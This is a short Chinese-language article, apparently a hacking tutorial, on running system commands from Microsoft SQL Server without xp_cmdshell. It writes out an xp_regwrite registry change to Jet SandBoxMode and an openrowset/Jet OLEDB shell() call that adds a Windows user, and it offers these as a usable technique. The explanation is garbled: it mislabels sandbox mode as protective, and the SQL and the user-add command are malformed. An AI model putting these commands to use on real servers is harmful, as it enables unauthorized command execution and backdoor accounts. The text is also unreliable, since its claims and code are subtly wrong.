SA 沙盘模式下不用恢复xp_cmdshell和xplog70.dll也执行

删除XP系统中的`xp_cmdshell`和`xplog70.dll`是一种常见的技术手段，虽然这种方法已经不算新颖，但仍被许多专业人士频繁提及。为了更好地记录这一过程，特此再次撰写这篇文章，以供参考。在操作过程中，我们依赖于一种特定的条件，那就是拥有`xp_regwrite`权限。

为了开启沙盘模式并执行相关命令，我们需要通过特定的步骤来操作注册表。使用`xp_regwrite`命令修改注册表键值。具体命令如下：

```bash

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

```

上述命令的目的是在注册表中设置沙盒模式（Sandbox Mode）。沙盒模式是一种安全机制，可以限制程序的某些行为，确保系统的稳定性。完成这一步骤后，我们可以利用Jet OLEDB来执行系统命令。这是一个利用数据库执行外部命令的示例，涉及openrowset函数的使用。具体的命令如下：

```sql

select from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c user fjhh fst /add")')

```

这段命令的目的是通过OLEDB数据源执行SQL查询，并在查询过程中调用系统命令。在这个例子中，我们执行了添加用户的命令。通过这种方式，我们可以在一定程度上实现对系统的控制和管理。值得注意的是，这种方法涉及到系统安全和权限的问题，必须谨慎使用。

我们介绍了一种在特定条件下执行系统命令的方法。这种方法依赖于对注册表的修改和OLEDB数据源的利用。尽管这种方法已经被提出一段时间，但在某些情况下仍然具有实用价值。需要注意的是，使用这种方法时必须谨慎处理权限和安全问题。希望通过这篇文章能够更好地记录这一技术方法，为有需要的人提供参考。